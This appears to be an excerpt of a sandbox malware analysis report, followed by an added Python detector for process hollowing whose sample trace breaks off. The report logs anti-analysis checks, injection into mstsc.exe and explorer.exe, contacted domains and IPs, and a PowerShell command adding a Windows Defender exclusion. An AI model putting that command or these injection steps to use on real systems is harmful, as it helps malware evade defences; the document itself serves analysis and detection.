      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe API/Special instruction interceptor: Address: 7731BECA
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe API/Special instruction interceptor: Address: 7731D51A
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe API/Special instruction interceptor: Address: 7731D26A
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe API/Special instruction interceptor: Address: 7731C18A
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe API/Special instruction interceptor: Address: 7731C25A
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731C1DA
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731BFBA
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731BFDA
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\mstsc.exe API/Special instruction interceptor: Address: 7731C25A
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 89B7E second address: 89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 1B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 24F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 5FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 5120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 6FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 7FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 88B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: 98B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Code function: 7_2_00DB0101 rdtsc 7_2_00DB0101
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2016
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5599
Source: C:\Windows\SysWOW64\mstsc.exe Window / User API: threadDelayed 9777
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_9-13985
Source: C:\Windows\SysWOW64\mstsc.exe API coverage: 1.2 %
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3600 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe TID: 3756 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3936 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3940 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3872 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1340 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\mstsc.exe TID: 4020 Thread sleep count: 191 > 30
Source: C:\Windows\SysWOW64\mstsc.exe TID: 4020 Thread sleep time: -382000s >= -30000s
Source: C:\Windows\SysWOW64\mstsc.exe TID: 4020 Thread sleep count: 9777 > 30
Source: C:\Windows\SysWOW64\mstsc.exe TID: 4020 Thread sleep time: -19554000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 4068 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 10_2_009420E2 PathFindFileNameW,PathAppendW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,FindNextFileW,PathAppendW,FindNextFileW,FindClose, 10_2_009420E2
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000009.00000002.929382715.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000009.00000002.929382715.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000009.00000000.421597302.00000000025E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000009.00000002.929382715.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Code function: 7_2_00DB0101 rdtsc 7_2_00DB0101
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Code function: 7_2_00D600C4 NtCreateFile,LdrInitializeThunk, 7_2_00D600C4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 10_2_00943AE1 LoadLibraryW,GetProcAddress,FreeLibrary, 10_2_00943AE1
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Code function: 7_2_00D500EA mov eax, dword ptr fs:[00000030h] 7_2_00D500EA
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Code function: 7_2_00D50080 mov ecx, dword ptr fs:[00000030h] 7_2_00D50080
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Code function: 7_2_00D726F8 mov eax, dword ptr fs:[00000030h] 7_2_00D726F8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 10_2_02290080 mov ecx, dword ptr fs:[00000030h] 10_2_02290080
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 10_2_022900EA mov eax, dword ptr fs:[00000030h] 10_2_022900EA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 10_2_022B26F8 mov eax, dword ptr fs:[00000030h] 10_2_022B26F8
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 10_2_00968791 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00968791
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.launchyouglobal.com
Source: C:\Windows\explorer.exe Domain query: www.ko-or-a-news.com
Source: C:\Windows\explorer.exe Network Connect: 68.66.226.117 80
Source: C:\Windows\explorer.exe Domain query: www.affirmationtotebags.com
Source: C:\Windows\explorer.exe Domain query: www.education2jobs.com
Source: C:\Windows\explorer.exe Domain query: www.thecareskin.com
Source: C:\Windows\explorer.exe Domain query: www.opmk.monster
Source: C:\Windows\explorer.exe Network Connect: 13.248.213.45 80
Source: C:\Windows\explorer.exe Domain query: www.mbbwa4wp.cfd
Source: C:\Windows\explorer.exe Domain query: www.fcno30.com
Source: C:\Windows\explorer.exe Domain query: www.lifeofthobes.uk
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Source: C:\Windows\SysWOW64\mstsc.exe NtClose: Indirect: 0x2049DC5
Source: C:\Windows\SysWOW64\mstsc.exe NtUnmapViewOfSection: Indirect: 0x2049DB9
Source: C:\Windows\SysWOW64\mstsc.exe NtMapViewOfSection: Indirect: 0x2049D47
Source: C:\Windows\SysWOW64\mstsc.exe NtQueueApcThread: Indirect: 0x204A531
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe NtClose: Indirect: 0x19A56C
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe NtQueueApcThread: Indirect: 0x19A4F2
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Memory written: C:\Users\user\AppData\Roaming\ihbgfbin.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Thread register set: target process: 1244
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 1244
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 900000
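The indirect NtUnmapViewOfSection / NtMapViewOfSection / NtQueueApcThread calls, the MZ header (4D5A) written at base 400000, the execute-read-write sections mapped into mstsc.exe and explorer.exe, the thread-register change and the unmapped mstsc.exe image at 900000 are the individual stages of process hollowing and section-map/APC injection as they appear in an API trace. The following is an added example, not code from the Joe Sandbox report, of how a trace consumer can correlate those stages per source/target process pair instead of alerting on each call in isolation. The record layout (pid, api, target_pid, args), the PIDs and the argument values in SAMPLE_TRACE are constructed for this example and are not taken from the report.

```python
"""Correlate process-hollowing / APC-injection stages in an API-call trace.

Added example, not Joe Sandbox code. Each trace record is a constructed
dict with the keys pid, api, target_pid and args; the stage grouping below
mirrors the calls the report lists for ihbgfbin.exe -> mstsc.exe / explorer.exe.
"""
from collections import defaultdict
from dataclasses import dataclass, field

# Native and Win32 API names grouped by the role they play in an injection chain.
UNMAP = {"NtUnmapViewOfSection"}
MAPSEC = {"NtMapViewOfSection"}
WRITE = {"NtWriteVirtualMemory", "WriteProcessMemory"}
HIJACK = {"NtSetContextThread", "SetThreadContext", "NtQueueApcThread", "QueueUserAPC"}
RESUME = {"NtResumeThread", "ResumeThread"}
PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class InjectionState:
    """Stages observed so far for one (source pid, target pid) pair."""
    unmapped: bool = False            # target image unmapped (hollowing prerequisite)
    pe_header_written: bool = False   # a buffer starting with "MZ" was written into the target
    rwx_section_mapped: bool = False  # a section was mapped into the target as RWX
    thread_hijacked: bool = False     # thread context changed or APC queued in the target
    resumed: bool = False
    evidence: list = field(default_factory=list)

    def verdict(self):
        """Name the technique once enough stages line up, otherwise None."""
        if self.unmapped and self.pe_header_written and self.thread_hijacked:
            return "process hollowing"
        if self.rwx_section_mapped and self.thread_hijacked:
            return "section-map injection with APC/context hijack"
        return None


def analyse_trace(records):
    """Return {(source_pid, target_pid): verdict} for every pair that completes a chain."""
    states = defaultdict(InjectionState)
    for r in records:
        # Calls a process makes on itself are not cross-process injection.
        if r["target_pid"] is None or r["target_pid"] == r["pid"]:
            continue
        st = states[(r["pid"], r["target_pid"])]
        api, args = r["api"], r.get("args", {})
        if api in UNMAP:
            st.unmapped = True
        elif api in WRITE and args.get("data", b"")[:2] == b"MZ":
            st.pe_header_written = True
        elif api in MAPSEC and args.get("protect") == PAGE_EXECUTE_READWRITE:
            st.rwx_section_mapped = True
        elif api in HIJACK:
            st.thread_hijacked = True
        elif api in RESUME:
            st.resumed = True
        else:
            continue
        st.evidence.append(api)
    return {pair: st.verdict() for pair, st in states.items() if st.verdict()}


# Constructed trace modelled on the report's chain; PIDs and values are made up.
SAMPLE_TRACE = [
    # ihbgfbin.exe (3756) hollows a suspended mstsc.exe (4020)
    {"pid": 3756, "api": "NtUnmapViewOfSection", "target_pid": 4020, "args": {"base": 0x900000}},
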